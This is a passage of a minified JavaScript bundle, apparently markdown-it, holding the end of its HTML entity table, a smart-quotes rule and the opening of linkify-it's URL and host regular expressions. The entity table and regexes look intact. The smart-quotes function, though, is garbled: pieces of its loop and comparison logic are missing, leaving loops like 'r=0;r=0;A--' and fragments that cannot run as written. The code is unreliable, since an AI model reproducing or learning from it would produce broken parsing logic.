cy":"Ќ","kjcy":"ќ","Kopf":"𝕂","kopf":"𝕜","Kscr":"𝒦","kscr":"𝓀","lAarr":"⇚","Lacute":"Ĺ","lacute":"ĺ","laemptyv":"⦴","lagran":"ℒ","Lambda":"Λ","lambda":"λ","lang":"⟨","Lang":"⟪","langd":"⦑","langle":"⟨","lap":"⪅","Laplacetrf":"ℒ","laquo":"«","larrb":"⇤","larrbfs":"⤟","larr":"←","Larr":"↞","lArr":"⇐","larrfs":"⤝","larrhk":"↩","larrlp":"↫","larrpl":"⤹","larrsim":"⥳","larrtl":"↢","latail":"⤙","lAtail":"⤛","lat":"⪫","late":"⪭","lates":"⪭︀","lbarr":"⤌","lBarr":"⤎","lbbrk":"❲","lbrace":"{","lbrack":"[","lbrke":"⦋","lbrksld":"⦏","lbrkslu":"⦍","Lcaron":"Ľ","lcaron":"ľ","Lcedil":"Ļ","lcedil":"ļ","lceil":"⌈","lcub":"{","Lcy":"Л","lcy":"л","ldca":"⤶","ldquo":"“","ldquor":"„","ldrdhar":"⥧","ldrushar":"⥋","ldsh":"↲","le":"≤","lE":"≦","LeftAngleBracket":"⟨","LeftArrowBar":"⇤","leftarrow":"←","LeftArrow":"←","Leftarrow":"⇐","LeftArrowRightArrow":"⇆","leftarrowtail":"↢","LeftCeiling":"⌈","LeftDoubleBracket":"⟦","LeftDownTeeVector":"⥡","LeftDownVectorBar":"⥙","LeftDownVector":"⇃","LeftFloor":"⌊","leftharpoondown":"↽","leftharpoonup":"↼","leftleftarrows":"⇇","leftrightarrow":"↔","LeftRightArrow":"↔","Leftrightarrow":"⇔","leftrightarrows":"⇆","leftrightharpoons":"⇋","leftrightsquigarrow":"↭","LeftRightVector":"⥎","LeftTeeArrow":"↤","LeftTee":"⊣","LeftTeeVector":"⥚","leftthreetimes":"⋋","LeftTriangleBar":"⧏","LeftTriangle":"⊲","LeftTriangleEqual":"⊴","LeftUpDownVector":"⥑","LeftUpTeeVector":"⥠","LeftUpVectorBar":"⥘","LeftUpVector":"↿","LeftVectorBar":"⥒","LeftVector":"↼","lEg":"⪋","leg":"⋚","leq":"≤","leqq":"≦","leqslant":"⩽","lescc":"⪨","les":"⩽","lesdot":"⩿","lesdoto":"⪁","lesdotor":"⪃","lesg":"⋚︀","lesges":"⪓","lessapprox":"⪅","lessdot":"⋖","lesseqgtr":"⋚","lesseqqgtr":"⪋","LessEqualGreater":"⋚","LessFullEqual":"≦","LessGreater":"≶","lessgtr":"≶","LessLess":"⪡","lesssim":"≲","LessSlantEqual":"⩽","LessTilde":"≲","lfisht":"⥼","lfloor":"⌊","Lfr":"𝔏","lfr":"𝔩","lg":"≶","lgE":"⪑","lHar":"⥢","lhard":"↽","lharu":"↼","lharul":"⥪","lhblk":"▄","LJcy":"Љ","ljcy":"љ","llarr":"⇇","ll":"≪","Ll":"⋘","llcorner":"⌞","Lleftarrow":"⇚","llhard":"⥫","lltri":"◺","Lmidot":"Ŀ","lmidot":"ŀ","lmoustache":"⎰","lmoust":"⎰","lnap":"⪉","lnapprox":"⪉","lne":"⪇","lnE":"≨","lneq":"⪇","lneqq":"≨","lnsim":"⋦","loang":"⟬","loarr":"⇽","lobrk":"⟦","longleftarrow":"⟵","LongLeftArrow":"⟵","Longleftarrow":"⟸","longleftrightarrow":"⟷","LongLeftRightArrow":"⟷","Longleftrightarrow":"⟺","longmapsto":"⟼","longrightarrow":"⟶","LongRightArrow":"⟶","Longrightarrow":"⟹","looparrowleft":"↫","looparrowright":"↬","lopar":"⦅","Lopf":"𝕃","lopf":"𝕝","loplus":"⨭","lotimes":"⨴","lowast":"∗","lowbar":"_","LowerLeftArrow":"↙","LowerRightArrow":"↘","loz":"◊","lozenge":"◊","lozf":"⧫","lpar":"(","lparlt":"⦓","lrarr":"⇆","lrcorner":"⌟","lrhar":"⇋","lrhard":"⥭","lrm":"‎","lrtri":"⊿","lsaquo":"‹","lscr":"𝓁","Lscr":"ℒ","lsh":"↰","Lsh":"↰","lsim":"≲","lsime":"⪍","lsimg":"⪏","lsqb":"[","lsquo":"‘","lsquor":"‚","Lstrok":"Ł","lstrok":"ł","ltcc":"⪦","ltcir":"⩹","lt":"<","LT":"<","Lt":"≪","ltdot":"⋖","lthree":"⋋","ltimes":"⋉","ltlarr":"⥶","ltquest":"⩻","ltri":"◃","ltrie":"⊴","ltrif":"◂","ltrPar":"⦖","lurdshar":"⥊","luruhar":"⥦","lvertneqq":"≨︀","lvnE":"≨︀","macr":"¯","male":"♂","malt":"✠","maltese":"✠","Map":"⤅","map":"↦","mapsto":"↦","mapstodown":"↧","mapstoleft":"↤","mapstoup":"↥","marker":"▮","mcomma":"⨩","Mcy":"М","mcy":"м","mdash":"—","mDDot":"∺","measuredangle":"∡","MediumSpace":" ","Mellintrf":"ℳ","Mfr":"𝔐","mfr":"𝔪","mho":"℧","micro":"µ","midast":"*","midcir":"⫰","mid":"∣","middot":"·","minusb":"⊟","minus":"−","minusd":"∸","minusdu":"⨪","MinusPlus":"∓","mlcp":"⫛","mldr":"…","mnplus":"∓","models":"⊧","Mopf":"𝕄","mopf":"𝕞","mp":"∓","mscr":"𝓂","Mscr":"ℳ","mstpos":"∾","Mu":"Μ","mu":"μ","multimap":"⊸","mumap":"⊸","nabla":"∇","Nacute":"Ń","nacute":"ń","nang":"∠⃒","nap":"≉","napE":"⩰̸","napid":"≋̸","napos":"ʼn","napprox":"≉","natural":"♮","naturals":"ℕ","natur":"♮","nbsp":" ","nbump":"≎̸","nbumpe":"≏̸","ncap":"⩃","Ncaron":"Ň","ncaron":"ň","Ncedil":"Ņ","ncedil":"ņ","ncong":"≇","ncongdot":"⩭̸","ncup":"⩂","Ncy":"Н","ncy":"н","ndash":"–","nearhk":"⤤","nearr":"↗","neArr":"⇗","nearrow":"↗","ne":"≠","nedot":"≐̸","NegativeMediumSpace":"​","NegativeThickSpace":"​","NegativeThinSpace":"​","NegativeVeryThinSpace":"​","nequiv":"≢","nesear":"⤨","nesim":"≂̸","NestedGreaterGreater":"≫","NestedLessLess":"≪","NewLine":"\\n","nexist":"∄","nexists":"∄","Nfr":"𝔑","nfr":"𝔫","ngE":"≧̸","nge":"≱","ngeq":"≱","ngeqq":"≧̸","ngeqslant":"⩾̸","nges":"⩾̸","nGg":"⋙̸","ngsim":"≵","nGt":"≫⃒","ngt":"≯","ngtr":"≯","nGtv":"≫̸","nharr":"↮","nhArr":"⇎","nhpar":"⫲","ni":"∋","nis":"⋼","nisd":"⋺","niv":"∋","NJcy":"Њ","njcy":"њ","nlarr":"↚","nlArr":"⇍","nldr":"‥","nlE":"≦̸","nle":"≰","nleftarrow":"↚","nLeftarrow":"⇍","nleftrightarrow":"↮","nLeftrightarrow":"⇎","nleq":"≰","nleqq":"≦̸","nleqslant":"⩽̸","nles":"⩽̸","nless":"≮","nLl":"⋘̸","nlsim":"≴","nLt":"≪⃒","nlt":"≮","nltri":"⋪","nltrie":"⋬","nLtv":"≪̸","nmid":"∤","NoBreak":"⁠","NonBreakingSpace":" ","nopf":"𝕟","Nopf":"ℕ","Not":"⫬","not":"¬","NotCongruent":"≢","NotCupCap":"≭","NotDoubleVerticalBar":"∦","NotElement":"∉","NotEqual":"≠","NotEqualTilde":"≂̸","NotExists":"∄","NotGreater":"≯","NotGreaterEqual":"≱","NotGreaterFullEqual":"≧̸","NotGreaterGreater":"≫̸","NotGreaterLess":"≹","NotGreaterSlantEqual":"⩾̸","NotGreaterTilde":"≵","NotHumpDownHump":"≎̸","NotHumpEqual":"≏̸","notin":"∉","notindot":"⋵̸","notinE":"⋹̸","notinva":"∉","notinvb":"⋷","notinvc":"⋶","NotLeftTriangleBar":"⧏̸","NotLeftTriangle":"⋪","NotLeftTriangleEqual":"⋬","NotLess":"≮","NotLessEqual":"≰","NotLessGreater":"≸","NotLessLess":"≪̸","NotLessSlantEqual":"⩽̸","NotLessTilde":"≴","NotNestedGreaterGreater":"⪢̸","NotNestedLessLess":"⪡̸","notni":"∌","notniva":"∌","notnivb":"⋾","notnivc":"⋽","NotPrecedes":"⊀","NotPrecedesEqual":"⪯̸","NotPrecedesSlantEqual":"⋠","NotReverseElement":"∌","NotRightTriangleBar":"⧐̸","NotRightTriangle":"⋫","NotRightTriangleEqual":"⋭","NotSquareSubset":"⊏̸","NotSquareSubsetEqual":"⋢","NotSquareSuperset":"⊐̸","NotSquareSupersetEqual":"⋣","NotSubset":"⊂⃒","NotSubsetEqual":"⊈","NotSucceeds":"⊁","NotSucceedsEqual":"⪰̸","NotSucceedsSlantEqual":"⋡","NotSucceedsTilde":"≿̸","NotSuperset":"⊃⃒","NotSupersetEqual":"⊉","NotTilde":"≁","NotTildeEqual":"≄","NotTildeFullEqual":"≇","NotTildeTilde":"≉","NotVerticalBar":"∤","nparallel":"∦","npar":"∦","nparsl":"⫽⃥","npart":"∂̸","npolint":"⨔","npr":"⊀","nprcue":"⋠","nprec":"⊀","npreceq":"⪯̸","npre":"⪯̸","nrarrc":"⤳̸","nrarr":"↛","nrArr":"⇏","nrarrw":"↝̸","nrightarrow":"↛","nRightarrow":"⇏","nrtri":"⋫","nrtrie":"⋭","nsc":"⊁","nsccue":"⋡","nsce":"⪰̸","Nscr":"𝒩","nscr":"𝓃","nshortmid":"∤","nshortparallel":"∦","nsim":"≁","nsime":"≄","nsimeq":"≄","nsmid":"∤","nspar":"∦","nsqsube":"⋢","nsqsupe":"⋣","nsub":"⊄","nsubE":"⫅̸","nsube":"⊈","nsubset":"⊂⃒","nsubseteq":"⊈","nsubseteqq":"⫅̸","nsucc":"⊁","nsucceq":"⪰̸","nsup":"⊅","nsupE":"⫆̸","nsupe":"⊉","nsupset":"⊃⃒","nsupseteq":"⊉","nsupseteqq":"⫆̸","ntgl":"≹","Ntilde":"Ñ","ntilde":"ñ","ntlg":"≸","ntriangleleft":"⋪","ntrianglelefteq":"⋬","ntriangleright":"⋫","ntrianglerighteq":"⋭","Nu":"Ν","nu":"ν","num":"#","numero":"№","numsp":" ","nvap":"≍⃒","nvdash":"⊬","nvDash":"⊭","nVdash":"⊮","nVDash":"⊯","nvge":"≥⃒","nvgt":">⃒","nvHarr":"⤄","nvinfin":"⧞","nvlArr":"⤂","nvle":"≤⃒","nvlt":"<⃒","nvltrie":"⊴⃒","nvrArr":"⤃","nvrtrie":"⊵⃒","nvsim":"∼⃒","nwarhk":"⤣","nwarr":"↖","nwArr":"⇖","nwarrow":"↖","nwnear":"⤧","Oacute":"Ó","oacute":"ó","oast":"⊛","Ocirc":"Ô","ocirc":"ô","ocir":"⊚","Ocy":"О","ocy":"о","odash":"⊝","Odblac":"Ő","odblac":"ő","odiv":"⨸","odot":"⊙","odsold":"⦼","OElig":"Œ","oelig":"œ","ofcir":"⦿","Ofr":"𝔒","ofr":"𝔬","ogon":"˛","Ograve":"Ò","ograve":"ò","ogt":"⧁","ohbar":"⦵","ohm":"Ω","oint":"∮","olarr":"↺","olcir":"⦾","olcross":"⦻","oline":"‾","olt":"⧀","Omacr":"Ō","omacr":"ō","Omega":"Ω","omega":"ω","Omicron":"Ο","omicron":"ο","omid":"⦶","ominus":"⊖","Oopf":"𝕆","oopf":"𝕠","opar":"⦷","OpenCurlyDoubleQuote":"“","OpenCurlyQuote":"‘","operp":"⦹","oplus":"⊕","orarr":"↻","Or":"⩔","or":"∨","ord":"⩝","order":"ℴ","orderof":"ℴ","ordf":"ª","ordm":"º","origof":"⊶","oror":"⩖","orslope":"⩗","orv":"⩛","oS":"Ⓢ","Oscr":"𝒪","oscr":"ℴ","Oslash":"Ø","oslash":"ø","osol":"⊘","Otilde":"Õ","otilde":"õ","otimesas":"⨶","Otimes":"⨷","otimes":"⊗","Ouml":"Ö","ouml":"ö","ovbar":"⌽","OverBar":"‾","OverBrace":"⏞","OverBracket":"⎴","OverParenthesis":"⏜","para":"¶","parallel":"∥","par":"∥","parsim":"⫳","parsl":"⫽","part":"∂","PartialD":"∂","Pcy":"П","pcy":"п","percnt":"%","period":".","permil":"‰","perp":"⊥","pertenk":"‱","Pfr":"𝔓","pfr":"𝔭","Phi":"Φ","phi":"φ","phiv":"ϕ","phmmat":"ℳ","phone":"☎","Pi":"Π","pi":"π","pitchfork":"⋔","piv":"ϖ","planck":"ℏ","planckh":"ℎ","plankv":"ℏ","plusacir":"⨣","plusb":"⊞","pluscir":"⨢","plus":"+","plusdo":"∔","plusdu":"⨥","pluse":"⩲","PlusMinus":"±","plusmn":"±","plussim":"⨦","plustwo":"⨧","pm":"±","Poincareplane":"ℌ","pointint":"⨕","popf":"𝕡","Popf":"ℙ","pound":"£","prap":"⪷","Pr":"⪻","pr":"≺","prcue":"≼","precapprox":"⪷","prec":"≺","preccurlyeq":"≼","Precedes":"≺","PrecedesEqual":"⪯","PrecedesSlantEqual":"≼","PrecedesTilde":"≾","preceq":"⪯","precnapprox":"⪹","precneqq":"⪵","precnsim":"⋨","pre":"⪯","prE":"⪳","precsim":"≾","prime":"′","Prime":"″","primes":"ℙ","prnap":"⪹","prnE":"⪵","prnsim":"⋨","prod":"∏","Product":"∏","profalar":"⌮","profline":"⌒","profsurf":"⌓","prop":"∝","Proportional":"∝","Proportion":"∷","propto":"∝","prsim":"≾","prurel":"⊰","Pscr":"𝒫","pscr":"𝓅","Psi":"Ψ","psi":"ψ","puncsp":" ","Qfr":"𝔔","qfr":"𝔮","qint":"⨌","qopf":"𝕢","Qopf":"ℚ","qprime":"⁗","Qscr":"𝒬","qscr":"𝓆","quaternions":"ℍ","quatint":"⨖","quest":"?","questeq":"≟","quot":"\\"","QUOT":"\\"","rAarr":"⇛","race":"∽̱","Racute":"Ŕ","racute":"ŕ","radic":"√","raemptyv":"⦳","rang":"⟩","Rang":"⟫","rangd":"⦒","range":"⦥","rangle":"⟩","raquo":"»","rarrap":"⥵","rarrb":"⇥","rarrbfs":"⤠","rarrc":"⤳","rarr":"→","Rarr":"↠","rArr":"⇒","rarrfs":"⤞","rarrhk":"↪","rarrlp":"↬","rarrpl":"⥅","rarrsim":"⥴","Rarrtl":"⤖","rarrtl":"↣","rarrw":"↝","ratail":"⤚","rAtail":"⤜","ratio":"∶","rationals":"ℚ","rbarr":"⤍","rBarr":"⤏","RBarr":"⤐","rbbrk":"❳","rbrace":"}","rbrack":"]","rbrke":"⦌","rbrksld":"⦎","rbrkslu":"⦐","Rcaron":"Ř","rcaron":"ř","Rcedil":"Ŗ","rcedil":"ŗ","rceil":"⌉","rcub":"}","Rcy":"Р","rcy":"р","rdca":"⤷","rdldhar":"⥩","rdquo":"”","rdquor":"”","rdsh":"↳","real":"ℜ","realine":"ℛ","realpart":"ℜ","reals":"ℝ","Re":"ℜ","rect":"▭","reg":"®","REG":"®","ReverseElement":"∋","ReverseEquilibrium":"⇋","ReverseUpEquilibrium":"⥯","rfisht":"⥽","rfloor":"⌋","rfr":"𝔯","Rfr":"ℜ","rHar":"⥤","rhard":"⇁","rharu":"⇀","rharul":"⥬","Rho":"Ρ","rho":"ρ","rhov":"ϱ","RightAngleBracket":"⟩","RightArrowBar":"⇥","rightarrow":"→","RightArrow":"→","Rightarrow":"⇒","RightArrowLeftArrow":"⇄","rightarrowtail":"↣","RightCeiling":"⌉","RightDoubleBracket":"⟧","RightDownTeeVector":"⥝","RightDownVectorBar":"⥕","RightDownVector":"⇂","RightFloor":"⌋","rightharpoondown":"⇁","rightharpoonup":"⇀","rightleftarrows":"⇄","rightleftharpoons":"⇌","rightrightarrows":"⇉","rightsquigarrow":"↝","RightTeeArrow":"↦","RightTee":"⊢","RightTeeVector":"⥛","rightthreetimes":"⋌","RightTriangleBar":"⧐","RightTriangle":"⊳","RightTriangleEqual":"⊵","RightUpDownVector":"⥏","RightUpTeeVector":"⥜","RightUpVectorBar":"⥔","RightUpVector":"↾","RightVectorBar":"⥓","RightVector":"⇀","ring":"˚","risingdotseq":"≓","rlarr":"⇄","rlhar":"⇌","rlm":"‏","rmoustache":"⎱","rmoust":"⎱","rnmid":"⫮","roang":"⟭","roarr":"⇾","robrk":"⟧","ropar":"⦆","ropf":"𝕣","Ropf":"ℝ","roplus":"⨮","rotimes":"⨵","RoundImplies":"⥰","rpar":")","rpargt":"⦔","rppolint":"⨒","rrarr":"⇉","Rrightarrow":"⇛","rsaquo":"›","rscr":"𝓇","Rscr":"ℛ","rsh":"↱","Rsh":"↱","rsqb":"]","rsquo":"’","rsquor":"’","rthree":"⋌","rtimes":"⋊","rtri":"▹","rtrie":"⊵","rtrif":"▸","rtriltri":"⧎","RuleDelayed":"⧴","ruluhar":"⥨","rx":"℞","Sacute":"Ś","sacute":"ś","sbquo":"‚","scap":"⪸","Scaron":"Š","scaron":"š","Sc":"⪼","sc":"≻","sccue":"≽","sce":"⪰","scE":"⪴","Scedil":"Ş","scedil":"ş","Scirc":"Ŝ","scirc":"ŝ","scnap":"⪺","scnE":"⪶","scnsim":"⋩","scpolint":"⨓","scsim":"≿","Scy":"С","scy":"с","sdotb":"⊡","sdot":"⋅","sdote":"⩦","searhk":"⤥","searr":"↘","seArr":"⇘","searrow":"↘","sect":"§","semi":";","seswar":"⤩","setminus":"∖","setmn":"∖","sext":"✶","Sfr":"𝔖","sfr":"𝔰","sfrown":"⌢","sharp":"♯","SHCHcy":"Щ","shchcy":"щ","SHcy":"Ш","shcy":"ш","ShortDownArrow":"↓","ShortLeftArrow":"←","shortmid":"∣","shortparallel":"∥","ShortRightArrow":"→","ShortUpArrow":"↑","shy":"­","Sigma":"Σ","sigma":"σ","sigmaf":"ς","sigmav":"ς","sim":"∼","simdot":"⩪","sime":"≃","simeq":"≃","simg":"⪞","simgE":"⪠","siml":"⪝","simlE":"⪟","simne":"≆","simplus":"⨤","simrarr":"⥲","slarr":"←","SmallCircle":"∘","smallsetminus":"∖","smashp":"⨳","smeparsl":"⧤","smid":"∣","smile":"⌣","smt":"⪪","smte":"⪬","smtes":"⪬︀","SOFTcy":"Ь","softcy":"ь","solbar":"⌿","solb":"⧄","sol":"/","Sopf":"𝕊","sopf":"𝕤","spades":"♠","spadesuit":"♠","spar":"∥","sqcap":"⊓","sqcaps":"⊓︀","sqcup":"⊔","sqcups":"⊔︀","Sqrt":"√","sqsub":"⊏","sqsube":"⊑","sqsubset":"⊏","sqsubseteq":"⊑","sqsup":"⊐","sqsupe":"⊒","sqsupset":"⊐","sqsupseteq":"⊒","square":"□","Square":"□","SquareIntersection":"⊓","SquareSubset":"⊏","SquareSubsetEqual":"⊑","SquareSuperset":"⊐","SquareSupersetEqual":"⊒","SquareUnion":"⊔","squarf":"▪","squ":"□","squf":"▪","srarr":"→","Sscr":"𝒮","sscr":"𝓈","ssetmn":"∖","ssmile":"⌣","sstarf":"⋆","Star":"⋆","star":"☆","starf":"★","straightepsilon":"ϵ","straightphi":"ϕ","strns":"¯","sub":"⊂","Sub":"⋐","subdot":"⪽","subE":"⫅","sube":"⊆","subedot":"⫃","submult":"⫁","subnE":"⫋","subne":"⊊","subplus":"⪿","subrarr":"⥹","subset":"⊂","Subset":"⋐","subseteq":"⊆","subseteqq":"⫅","SubsetEqual":"⊆","subsetneq":"⊊","subsetneqq":"⫋","subsim":"⫇","subsub":"⫕","subsup":"⫓","succapprox":"⪸","succ":"≻","succcurlyeq":"≽","Succeeds":"≻","SucceedsEqual":"⪰","SucceedsSlantEqual":"≽","SucceedsTilde":"≿","succeq":"⪰","succnapprox":"⪺","succneqq":"⪶","succnsim":"⋩","succsim":"≿","SuchThat":"∋","sum":"∑","Sum":"∑","sung":"♪","sup1":"¹","sup2":"²","sup3":"³","sup":"⊃","Sup":"⋑","supdot":"⪾","supdsub":"⫘","supE":"⫆","supe":"⊇","supedot":"⫄","Superset":"⊃","SupersetEqual":"⊇","suphsol":"⟉","suphsub":"⫗","suplarr":"⥻","supmult":"⫂","supnE":"⫌","supne":"⊋","supplus":"⫀","supset":"⊃","Supset":"⋑","supseteq":"⊇","supseteqq":"⫆","supsetneq":"⊋","supsetneqq":"⫌","supsim":"⫈","supsub":"⫔","supsup":"⫖","swarhk":"⤦","swarr":"↙","swArr":"⇙","swarrow":"↙","swnwar":"⤪","szlig":"ß","Tab":"\\t","target":"⌖","Tau":"Τ","tau":"τ","tbrk":"⎴","Tcaron":"Ť","tcaron":"ť","Tcedil":"Ţ","tcedil":"ţ","Tcy":"Т","tcy":"т","tdot":"⃛","telrec":"⌕","Tfr":"𝔗","tfr":"𝔱","there4":"∴","therefore":"∴","Therefore":"∴","Theta":"Θ","theta":"θ","thetasym":"ϑ","thetav":"ϑ","thickapprox":"≈","thicksim":"∼","ThickSpace":"  ","ThinSpace":" ","thinsp":" ","thkap":"≈","thksim":"∼","THORN":"Þ","thorn":"þ","tilde":"˜","Tilde":"∼","TildeEqual":"≃","TildeFullEqual":"≅","TildeTilde":"≈","timesbar":"⨱","timesb":"⊠","times":"×","timesd":"⨰","tint":"∭","toea":"⤨","topbot":"⌶","topcir":"⫱","top":"⊤","Topf":"𝕋","topf":"𝕥","topfork":"⫚","tosa":"⤩","tprime":"‴","trade":"™","TRADE":"™","triangle":"▵","triangledown":"▿","triangleleft":"◃","trianglelefteq":"⊴","triangleq":"≜","triangleright":"▹","trianglerighteq":"⊵","tridot":"◬","trie":"≜","triminus":"⨺","TripleDot":"⃛","triplus":"⨹","trisb":"⧍","tritime":"⨻","trpezium":"⏢","Tscr":"𝒯","tscr":"𝓉","TScy":"Ц","tscy":"ц","TSHcy":"Ћ","tshcy":"ћ","Tstrok":"Ŧ","tstrok":"ŧ","twixt":"≬","twoheadleftarrow":"↞","twoheadrightarrow":"↠","Uacute":"Ú","uacute":"ú","uarr":"↑","Uarr":"↟","uArr":"⇑","Uarrocir":"⥉","Ubrcy":"Ў","ubrcy":"ў","Ubreve":"Ŭ","ubreve":"ŭ","Ucirc":"Û","ucirc":"û","Ucy":"У","ucy":"у","udarr":"⇅","Udblac":"Ű","udblac":"ű","udhar":"⥮","ufisht":"⥾","Ufr":"𝔘","ufr":"𝔲","Ugrave":"Ù","ugrave":"ù","uHar":"⥣","uharl":"↿","uharr":"↾","uhblk":"▀","ulcorn":"⌜","ulcorner":"⌜","ulcrop":"⌏","ultri":"◸","Umacr":"Ū","umacr":"ū","uml":"¨","UnderBar":"_","UnderBrace":"⏟","UnderBracket":"⎵","UnderParenthesis":"⏝","Union":"⋃","UnionPlus":"⊎","Uogon":"Ų","uogon":"ų","Uopf":"𝕌","uopf":"𝕦","UpArrowBar":"⤒","uparrow":"↑","UpArrow":"↑","Uparrow":"⇑","UpArrowDownArrow":"⇅","updownarrow":"↕","UpDownArrow":"↕","Updownarrow":"⇕","UpEquilibrium":"⥮","upharpoonleft":"↿","upharpoonright":"↾","uplus":"⊎","UpperLeftArrow":"↖","UpperRightArrow":"↗","upsi":"υ","Upsi":"ϒ","upsih":"ϒ","Upsilon":"Υ","upsilon":"υ","UpTeeArrow":"↥","UpTee":"⊥","upuparrows":"⇈","urcorn":"⌝","urcorner":"⌝","urcrop":"⌎","Uring":"Ů","uring":"ů","urtri":"◹","Uscr":"𝒰","uscr":"𝓊","utdot":"⋰","Utilde":"Ũ","utilde":"ũ","utri":"▵","utrif":"▴","uuarr":"⇈","Uuml":"Ü","uuml":"ü","uwangle":"⦧","vangrt":"⦜","varepsilon":"ϵ","varkappa":"ϰ","varnothing":"∅","varphi":"ϕ","varpi":"ϖ","varpropto":"∝","varr":"↕","vArr":"⇕","varrho":"ϱ","varsigma":"ς","varsubsetneq":"⊊︀","varsubsetneqq":"⫋︀","varsupsetneq":"⊋︀","varsupsetneqq":"⫌︀","vartheta":"ϑ","vartriangleleft":"⊲","vartriangleright":"⊳","vBar":"⫨","Vbar":"⫫","vBarv":"⫩","Vcy":"В","vcy":"в","vdash":"⊢","vDash":"⊨","Vdash":"⊩","VDash":"⊫","Vdashl":"⫦","veebar":"⊻","vee":"∨","Vee":"⋁","veeeq":"≚","vellip":"⋮","verbar":"|","Verbar":"‖","vert":"|","Vert":"‖","VerticalBar":"∣","VerticalLine":"|","VerticalSeparator":"❘","VerticalTilde":"≀","VeryThinSpace":" ","Vfr":"𝔙","vfr":"𝔳","vltri":"⊲","vnsub":"⊂⃒","vnsup":"⊃⃒","Vopf":"𝕍","vopf":"𝕧","vprop":"∝","vrtri":"⊳","Vscr":"𝒱","vscr":"𝓋","vsubnE":"⫋︀","vsubne":"⊊︀","vsupnE":"⫌︀","vsupne":"⊋︀","Vvdash":"⊪","vzigzag":"⦚","Wcirc":"Ŵ","wcirc":"ŵ","wedbar":"⩟","wedge":"∧","Wedge":"⋀","wedgeq":"≙","weierp":"℘","Wfr":"𝔚","wfr":"𝔴","Wopf":"𝕎","wopf":"𝕨","wp":"℘","wr":"≀","wreath":"≀","Wscr":"𝒲","wscr":"𝓌","xcap":"⋂","xcirc":"◯","xcup":"⋃","xdtri":"▽","Xfr":"𝔛","xfr":"𝔵","xharr":"⟷","xhArr":"⟺","Xi":"Ξ","xi":"ξ","xlarr":"⟵","xlArr":"⟸","xmap":"⟼","xnis":"⋻","xodot":"⨀","Xopf":"𝕏","xopf":"𝕩","xoplus":"⨁","xotime":"⨂","xrarr":"⟶","xrArr":"⟹","Xscr":"𝒳","xscr":"𝓍","xsqcup":"⨆","xuplus":"⨄","xutri":"△","xvee":"⋁","xwedge":"⋀","Yacute":"Ý","yacute":"ý","YAcy":"Я","yacy":"я","Ycirc":"Ŷ","ycirc":"ŷ","Ycy":"Ы","ycy":"ы","yen":"¥","Yfr":"𝔜","yfr":"𝔶","YIcy":"Ї","yicy":"ї","Yopf":"𝕐","yopf":"𝕪","Yscr":"𝒴","yscr":"𝓎","YUcy":"Ю","yucy":"ю","yuml":"ÿ","Yuml":"Ÿ","Zacute":"Ź","zacute":"ź","Zcaron":"Ž","zcaron":"ž","Zcy":"З","zcy":"з","Zdot":"Ż","zdot":"ż","zeetrf":"ℨ","ZeroWidthSpace":"​","Zeta":"Ζ","zeta":"ζ","zfr":"𝔷","Zfr":"ℨ","ZHcy":"Ж","zhcy":"ж","zigrarr":"⇝","zopf":"𝕫","Zopf":"ℤ","Zscr":"𝒵","zscr":"𝓏","zwj":"‍","zwnj":"‌"}')},af30:function(e,t,r){"use strict";var n=r("0068").isWhiteSpace,s=r("0068").isPunctChar,i=r("0068").isMdAsciiPunct,o=/['"]/,a=/['"]/g,c="’";function u(e,t,r){return e.slice(0,t)+r+e.slice(t+1)}function l(e,t){var r,o,l,p,h,f,d,m,g,_,b,k,v,y,C,x,A,w,D,E,q;for(D=[],r=0;r=0;A--)if(D[A].level<=d)break;if(D.length=A+1,"text"===o.type){l=o.content,h=0,f=l.length;e:while(h=0)g=l.charCodeAt(p.index-1);else for(A=r-1;A>=0;A--){if("softbreak"===e[A].type||"hardbreak"===e[A].type)break;if(e[A].content){g=e[A].content.charCodeAt(e[A].content.length-1);break}}if(_=32,h=48&&g<=57&&(x=C=!1),C&&x&&(C=b,x=k),C||x){if(x)for(A=D.length-1;A>=0;A--){if(m=D[A],D[A].level=0;t--)"inline"===e.tokens[t].type&&o.test(e.tokens[t].content)&&l(e.tokens[t].children,e)}},b117:function(e,t,r){"use strict";e.exports=function(e){var t={};e=e||{},t.src_Any=r("cbc7").source,t.src_Cc=r("a7bc").source,t.src_Z=r("4fc2").source,t.src_P=r("7ca0").source,t.src_ZPCc=[t.src_Z,t.src_P,t.src_Cc].join("|"),t.src_ZCc=[t.src_Z,t.src_Cc].join("|");var n="[><|]";return t.src_pseudo_letter="(?:(?!"+n+"|"+t.src_ZPCc+")"+t.src_Any+")",t.src_ip4="(?:(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)",t.src_auth="(?:(?:(?!"+t.src_ZCc+"|[@/\\[\\]()]).)+@)?",t.src_port="(?::(?:6(?:[0-4]\\d{3}|5(?:[0-4]\\d{2}|5(?:[0-2]\\d|3[0-5])))|[1-5]?\\d{1,4}))?",t.src_host_terminator="(?=$|"+n+"|"+t.src_ZPCc+")(?!"+(e["---"]?"-(?!--)|":"-|")+"_|:\\d|\\.-|\\.(?!$|"+t.src_ZPCc+"))",t.src_path="(?:[/?#](?:(?!"+t.src_ZCc+"|"+n+"|[()[\\]{}.,\"'?!\\-;]).|\\[(?:(?!"+t.src_ZCc+"|\\]).)*\\]|\\((?:(?!"+t.src_ZCc+"|[)]).)*\\)|\\{(?:(?!"+t.src_ZCc+'|[}]).)*\\}|\\"(?:(?!'+t.src_ZCc+'|["]).)+\\"|\\\'(?:(?!'+t.src_ZCc+"|[']).)+\\'|\\'(?="+t.src_pseudo_letter+"|[-])|\\.{2,}[a-zA-Z0-9%/&]|\\.(?!"+t.src_ZCc+"|[.]|$)|"+(e["---"]?"\\-(?!--(?:[^-]|$))(?:-*)|":"\\-+|")+",(?!"+t.src_ZCc+"|$)|;(?!"+t.src_ZCc+"|$)|\\!+(?!"+t.src_ZCc+"|[!]|$)|\\?(?!"+t.src_ZCc+"|[?]|$))+|\\/)?",t.src_email_name='[\\-;:&=\\+\\$,\\.a-zA-Z0-9_][\\-;:&=\\+\\$,\\"\\.a-zA-Z0-9_]*',t.src_xn="xn--[a-z0-9\\-]{1,59}",t.src_domain_root="(?:"+t.src_xn+"|"+t.src_pseudo_letter+"{1,63})",t.src_domain="(?:"+t.src_xn+"|(?:"+t.src_pseudo_letter+")|(?:"+t.src_pseudo_letter+"(?:-|"+t.src_pseudo_letter+"){0,61}"+t.src_pseudo_letter+"))",t.src_host="(?:(?:(?:(?:"+t.src_domain+")\\.)*"+t.src_domain+"))",t.tpl_host_fuzzy="(?:"+t.src_ip4+"|(?:(?:(?:"+t.src_domain+")\\.)+(?:%TLDS%)))",t.tpl_host_no_ip_fuzzy="(?:(?:(?:"+t.src_domain+")\